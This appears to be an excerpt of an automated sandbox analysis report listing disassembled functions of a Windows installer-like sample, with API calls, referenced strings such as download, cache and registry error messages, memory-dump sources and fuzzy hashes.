Opcode Fuzzy Hash: c6a511d6d078fc22ab7c0eb68864fced9cbda11b433071645113506e07e15d36
Instruction Fuzzy Hash: 4C01B531385217FBDB206BAA9C45D6F7B5CFB84790B018012FA1592200DB70D941DBB0

Function 009AF639 Relevance: 15.2, APIs: 2, Strings: 8, Instructions: 155COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 009AF64E
LeaveCriticalSection.KERNEL32(?), ref: 009AF7C9

Strings

UX did not provide container or payload id., xrefs: 009AF7B8
Engine is active, cannot change engine state., xrefs: 009AF668
Failed to set download password., xrefs: 009AF777
UX requested unknown container with id: %ls, xrefs: 009AF6F3
Failed to set download user., xrefs: 009AF751
Failed to set download URL., xrefs: 009AF728
UX requested unknown payload with id: %ls, xrefs: 009AF6A3
UX denied while trying to set download URL on embedded payload: %ls, xrefs: 009AF6B9

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
API String ID: 3168844106-2615595102
Opcode ID: dcf8232b8286dddda8405f3602cba2ee4a2d6bf6337e0b062c36fddf6694e606
Instruction ID: e43c6b6b49b74d151459c2ebc1eedcba8fd4edd97d218ab4a88c675e446a3a5c
Opcode Fuzzy Hash: dcf8232b8286dddda8405f3602cba2ee4a2d6bf6337e0b062c36fddf6694e606
Instruction Fuzzy Hash: 3241F332A04616ABCB219FA4CC55F6AB3ACEF42711F158176F814EB290EB35ED50C7D1

Function 009D5A5E Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,00000410,000000FF,?,00000000,00000000), ref: 009D5A9B
GetLastError.KERNEL32 ref: 009D5AA9
VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 009D5AEA
GetLastError.KERNEL32 ref: 009D5AF7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 009D5C6A
CloseHandle.KERNEL32(?), ref: 009D5C79

Strings

dlutil.cpp, xrefs: 009D5ACD
GET, xrefs: 009D5B9E

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
String ID: GET$dlutil.cpp
API String ID: 2028584396-3303425918
Opcode ID: 125ca6a4fe540ee2e391c93e28127cc396060449ba056f2673eb17923dd4d132
Instruction ID: ea2ff5cfe48f4afa660d6a0f2d95b89cac9d8fc19d94be956cd635b4e398e1cd
Opcode Fuzzy Hash: 125ca6a4fe540ee2e391c93e28127cc396060449ba056f2673eb17923dd4d132
Instruction Fuzzy Hash: FA617A72A90619ABDB11CFA4CC45BAEBBB8AF48750F16811BFE14A7340E774DD40DB90

Function 009A0C50 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 009A1020: CompareStringW.KERNEL32(00000000,00000000,feclient.dll,000000FF,00000000,000000FF,00000000,00000000,?,?,009A0C6F,?,00000000,?,00000000,00000000), ref: 009A104F

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,00000000,?,00000000,00000001,?,?,00000000,?,00000000), ref: 009A0DF3
GetLastError.KERNEL32 ref: 009A0E00

Strings

Failed to append package start action., xrefs: 009A0C95
Failed to create syncpoint event., xrefs: 009A0E2E
plan.cpp, xrefs: 009A0E24
Failed to append cache action., xrefs: 009A0D4A
Failed to append payload cache action., xrefs: 009A0DAA
Failed to append rollback cache action., xrefs: 009A0CCF

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CompareCreateErrorEventLastString
String ID: Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
API String ID: 801187047-2489563283
Opcode ID: 39dd2800cac240d83dad0d961ec99a6a58fd2443b924b0a7693cb4e701906b97
Instruction ID: b2c71fd5d43d3bf658d25e27497bc14a02065bb4f76817b979a23834c389b776
Opcode Fuzzy Hash: 39dd2800cac240d83dad0d961ec99a6a58fd2443b924b0a7693cb4e701906b97
Instruction Fuzzy Hash: 4B61AF76500608EFCB05CF59C980A6ABBF9FFC9314F21845AE9499B351EB31EE41DB90

Function 009D6EFF Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 159COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,7556DFD0,000000FF,type,000000FF,?,7556DFD0,7556DFD0,7556DFD0), ref: 009D6F55
SysFreeString.OLEAUT32(00000000), ref: 009D6FA0
SysFreeString.OLEAUT32(00000000), ref: 009D701C
SysFreeString.OLEAUT32(00000000), ref: 009D7068

Strings

url, xrefs: 009D6F68
`5w, xrefs: 009D6FA0, 009D701C, 009D7068
type, xrefs: 009D6F47

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: String$Free$Compare
String ID: `5w$type$url
API String ID: 1324494773-456992405
Opcode ID: a70fd08a943b77df98fa8596ca27edaaba7fef45917841cdbddc72c0c98fc352
Instruction ID: 5b7fc8ecf5803c8c2992e4f24268d714c81065d3fc71bc0b73b6e3e189204525
Opcode Fuzzy Hash: a70fd08a943b77df98fa8596ca27edaaba7fef45917841cdbddc72c0c98fc352
Instruction Fuzzy Hash: FE514D36945219EFCB15DFE4C844FAEBBB8AF04711F15829AE511EB2A0E7319E40DB50

Function 009A05A2 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 133registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,009DB500,00000000,?), ref: 009A06D3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,009DB500,00000000,?), ref: 009A06E2

Part of subcall function 009D0BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,009A061A,?,00000000,00020006), ref: 009D0C0E

Strings

%ls.RebootRequired, xrefs: 009A05F0
Failed to delete registration key: %ls, xrefs: 009A0681
crypt32.dll, xrefs: 009A05AC
Failed to open registration key., xrefs: 009A071A
Failed to update resume mode., xrefs: 009A06B7
Failed to write volatile reboot required registry key., xrefs: 009A061E

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Close$Create
String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.$crypt32.dll
API String ID: 359002179-3398658923
Opcode ID: 2777b6461860cda912b84b26e2ef0ccb11507ae2903ffc0de4cf22b386877308
Instruction ID: 87399c11c7c76ed268e18d09cd6cf0e029e19c422d8fbb6030fa64f08d14efef
Opcode Fuzzy Hash: 2777b6461860cda912b84b26e2ef0ccb11507ae2903ffc0de4cf22b386877308
Instruction Fuzzy Hash: A6419E31940608FBDF22AFA0CC06FAF7BB9AFC1318F14451AF51562161D7719A60DB91

Function 0099F451 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 109stringCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 0099F48A

Part of subcall function 00994115: CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,009AA0E8,00000000,00000000,?,00000000,009953BD,00000000,?,?,0099D5B5,?), ref: 00994123
Part of subcall function 00994115: GetLastError.KERNEL32(?,009AA0E8,00000000,00000000,?,00000000,009953BD,00000000,?,?,0099D5B5,?,00000000,00000000), ref: 00994131

lstrlenA.KERNEL32(009DB500,00000000,00000094,00000000,00000094,?,?,009A04BF,swidtag,00000094,?,009DB518,009A04BF,00000000,?,00000000), ref: 0099F4DD

Part of subcall function 009D4DB3: CreateFileW.KERNEL32(009DB500,40000000,00000001,00000000,00000002,00000080,00000000,009A04BF,00000000,?,0099F4F4,?,00000080,009DB500,00000000), ref: 009D4DCB
Part of subcall function 009D4DB3: GetLastError.KERNEL32(?,0099F4F4,?,00000080,009DB500,00000000,?,009A04BF,?,00000094,?,?,?,?,?,00000000), ref: 009D4DD8

Strings

Failed to allocate regid folder path., xrefs: 0099F53C
Failed to write tag xml to file: %ls, xrefs: 0099F51B
swidtag, xrefs: 0099F49D
Failed to format tag folder path., xrefs: 0099F543
Failed to allocate regid file path., xrefs: 0099F535
Failed to create regid folder: %ls, xrefs: 0099F525

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CreateErrorLast$DirectoryFileOpen@16lstrlen
String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$swidtag
API String ID: 904508749-1201533908
Opcode ID: 2027856ebc1a261712d650dfd2a7735356c7b48d70522a96cdb2522deb3f05e7
Instruction ID: 32ecfae802b6c4c4e5580b053632d42de430b1abceb2ebbc90a8197ad8cc69de
Opcode Fuzzy Hash: 2027856ebc1a261712d650dfd2a7735356c7b48d70522a96cdb2522deb3f05e7
Instruction Fuzzy Hash: E0318C31D40229FBCF12AF98CC51BADFBB8AF44710F118166F910FA261D7719E509B91

Function 009A53E2 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 91synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,?,00000000,00000000,00000000,0099548E,00000000,00000000,?,00000000), ref: 009A548B
GetLastError.KERNEL32(?,?,?,00994C61,?,?,00000000,?,?,?,?,?,?,009DB4A0,?,?), ref: 009A5496

Strings

pipe.cpp, xrefs: 009A54BA
Failed to write exit code to message buffer., xrefs: 009A5406
Failed to post terminate message to child process cache thread., xrefs: 009A545A
Failed to post terminate message to child process., xrefs: 009A5476
Failed to write restart to message buffer., xrefs: 009A542E
Failed to wait for child process exit., xrefs: 009A54C4

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
API String ID: 1211598281-2161881128
Opcode ID: 896bac34044c9daebf83cf06b5880bfbc0742b4087a1c77384039db7cc48bb14
Instruction ID: 9b3e10190d583702201ca8900043fd190522d43f3a56f340b8937cf3588f2ca9
Opcode Fuzzy Hash: 896bac34044c9daebf83cf06b5880bfbc0742b4087a1c77384039db7cc48bb14
Instruction Fuzzy Hash: 75213A33A41A29BBCF225B91DC05F9E77A8EF49735F124216F910B61A0D734AD9096D0

Function 009A9098 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,009A9F04,00000003,000007D0,00000003,?,000007D0), ref: 009A90B2
GetLastError.KERNEL32(?,009A9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001,?), ref: 009A90BF
CloseHandle.KERNEL32(00000000,?,009A9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001), ref: 009A9187

Strings

Failed to verify catalog signature of payload: %ls, xrefs: 009A914E
Failed to open payload at path: %ls, xrefs: 009A9103
cache.cpp, xrefs: 009A90F6
Failed to verify signature of payload: %ls, xrefs: 009A912F
Failed to verify hash of payload: %ls, xrefs: 009A9172

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
API String ID: 2528220319-2757871984
Opcode ID: fa5df0732051d828c2303db1307e0101e33b18640198e4d06adb697adfe23a66
Instruction ID: 782408577ffccc8db3adfb724c02b537d5aa33c25675d91e5c38c68321ad43a4
Opcode Fuzzy Hash: fa5df0732051d828c2303db1307e0101e33b18640198e4d06adb697adfe23a66
Instruction Fuzzy Hash: 80212736548637B7CB331AA88C4DFAA7B59BF827B4F118311FD10261A093319C61EBD1

Function 00996B1E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 88COMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00996B69
GetLastError.KERNEL32 ref: 00996B73
GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 00996BB7
GetLastError.KERNEL32 ref: 00996BC1

Strings

Failed to get windows directory., xrefs: 00996BA1
Failed to set variant value., xrefs: 00996C0B
variable.cpp, xrefs: 00996B97, 00996BE5
Failed to get volume path name., xrefs: 00996BEF

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$DirectoryNamePathVolumeWindows
String ID: Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$variable.cpp
API String ID: 124030351-4026719079
Opcode ID: 304d3e5c1f8d433bb1a8343fdf48a2b8f78f00cc9275b4946c7963919356825e
Instruction ID: f9e687d5aed5ed884c224ce6aa978539a4c7eaf88eb0b0c5bab57653dad61ebc
Opcode Fuzzy Hash: 304d3e5c1f8d433bb1a8343fdf48a2b8f78f00cc9275b4946c7963919356825e
Instruction Fuzzy Hash: 7D210BB3E8623967DB3096598D06FDB77AC9B80B20F014567BE44F7241FA34AD4086E5

Function 00999C6D Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00999C88
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,000002C0,?,0099A895,00000100,000002C0,000002C0,?,000002C0), ref: 00999CA0
GetLastError.KERNEL32(?,0099A895,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 00999CAB

Strings

search.cpp, xrefs: 00999CDB
Failed to format variable string., xrefs: 00999C93
File search: %ls, did not find path: %ls, xrefs: 00999CFD
Failed get to file attributes. '%ls', xrefs: 00999CE8
Failed to set variable., xrefs: 00999D2B

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
API String ID: 1811509786-2053429945
Opcode ID: 796b12be4035f384175b6ff8f284f1ea1f955d461faa9b23e40f4e934e1bb1f1
Instruction ID: e249fa1bb2034ce1bccb7cb5b83b1030bd0a688ca672e12770e4f875dd661cb2
Opcode Fuzzy Hash: 796b12be4035f384175b6ff8f284f1ea1f955d461faa9b23e40f4e934e1bb1f1
Instruction Fuzzy Hash: 04215B33981124BBEF212ADC8D87FAEB758EF51765F10421AFE187A2D0E7216D1096E1

Function 009AAD40 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,?), ref: 009AAD57
GetLastError.KERNEL32 ref: 009AAD61
CoInitializeEx.OLE32(00000000,00000000), ref: 009AADA0
CoUninitialize.OLE32(?,009AC721,?,?), ref: 009AADDD

Strings

Failed to set elevated cache pipe into thread local storage for logging., xrefs: 009AAD8F
Failed to pump messages in child process., xrefs: 009AADCB
Failed to initialize COM., xrefs: 009AADAC
elevation.cpp, xrefs: 009AAD85

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorInitializeLastUninitializeValue
String ID: Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
API String ID: 876858697-113251691
Opcode ID: 405cb7be5d46a176d4e8b6bad9fb3aae566c523148855df591ad5387c1196e7d
Instruction ID: 0e0ffdf31ab6c7e2b4cae69e5258edcb20b2e5bc66b91c5ca55031824795fff0
Opcode Fuzzy Hash: 405cb7be5d46a176d4e8b6bad9fb3aae566c523148855df591ad5387c1196e7d
Instruction Fuzzy Hash: CC113672987635BB87221786CC09A9FBF68EF46B61B024117FD00B7690DB609C00D2D1

Function 00995CE2 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 54registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00995D68

Part of subcall function 009D10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 009D112B
Part of subcall function 009D10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 009D1163

Strings

+, xrefs: 00995CEA
Failed to read folder path for '%ls'., xrefs: 00995D34
SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 00995D05
Failed to ensure path was backslash terminated., xrefs: 00995D52
CommonFilesDir, xrefs: 00995CF0, 00995D24, 00995D33
Failed to open Windows folder key., xrefs: 00995D1A
ProgramFilesDir, xrefs: 00995CF7

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: QueryValue$Close
String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
API String ID: 1979452859-3209209246
Opcode ID: afe7109aeb8bf665a5ad4477f4fe72e25613a5bba64650fd48b04d072dacd362
Instruction ID: 42b57a0992d828d43fe12c94f8aecd74a28e5f5beb2a9ebaaf3576f1115ad82f
Opcode Fuzzy Hash: afe7109aeb8bf665a5ad4477f4fe72e25613a5bba64650fd48b04d072dacd362
Instruction Fuzzy Hash: ED01D6329C6628B7CF225698DC0AF5F77A8CB90724F16C157F9006636097718E009790

Function 009BA271 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 174COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 009BA33E
GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 009BA348

Strings

apply.cpp, xrefs: 009BA36C
:, xrefs: 009BA3C1
Failed to clear readonly bit on payload destination path: %ls, xrefs: 009BA377
download, xrefs: 009BA308
Failed attempt to download URL: '%ls' to: '%ls', xrefs: 009BA425

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: :$Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$download
API String ID: 1799206407-1905830404
Opcode ID: 9ba18c4362a6283490457cddde78af98350339a470619d08ec08cc28e5721485
Instruction ID: e0c7e0c4c62076108abad546acf09d87b7240cf618f8b04f615bb61ee126cb7e
Opcode Fuzzy Hash: 9ba18c4362a6283490457cddde78af98350339a470619d08ec08cc28e5721485
Instruction Fuzzy Hash: F251BF71A00219EBDB11DFA9C941AEEB7F8FF44720F10816AE914EB250E375DE40CB91

Function 009D84C7 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 156COMMON

Download Yara Rule

APIs

Part of subcall function 0099394F: GetProcessHeap.KERNEL32(?,000001C7,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993960
Part of subcall function 0099394F: RtlAllocateHeap.NTDLL(00000000,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993967

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000410,?,?,009B9063,000002C0,00000100), ref: 009D84F5
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,009B9063,000002C0,00000100,000002C0,000002C0,00000100,000002C0,00000410), ref: 009D8510

Strings

http://appsyndication.org/2006/appsyn, xrefs: 009D84E8
application, xrefs: 009D8502
apuputil.cpp, xrefs: 009D85AB
type, xrefs: 009D8537

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CompareHeapString$AllocateProcess
String ID: application$apuputil.cpp$http://appsyndication.org/2006/appsyn$type
API String ID: 2664528157-4206478990
Opcode ID: e7d30bac85786dc3c011daeea53b37c227d92a6ef1304a81fd21b047f8ec7d03
Instruction ID: b62998833f3dce30400be992ebe0fd3549f2225194ace826495395a9b45ae238
Opcode Fuzzy Hash: e7d30bac85786dc3c011daeea53b37c227d92a6ef1304a81fd21b047f8ec7d03
Instruction Fuzzy Hash: 5A516071684305ABDB209E55CC86F1B7BA9AB40B70F20C656FA65AB3D2DB70ED408B50

Function 009D64B7 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154fileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 009D6513
DeleteFileW.KERNEL32(00000410,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 009D660A
CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 009D6619

Strings

Burn, xrefs: 009D6502
DownloadTimeout, xrefs: 009D654C
dlutil.cpp, xrefs: 009D6537
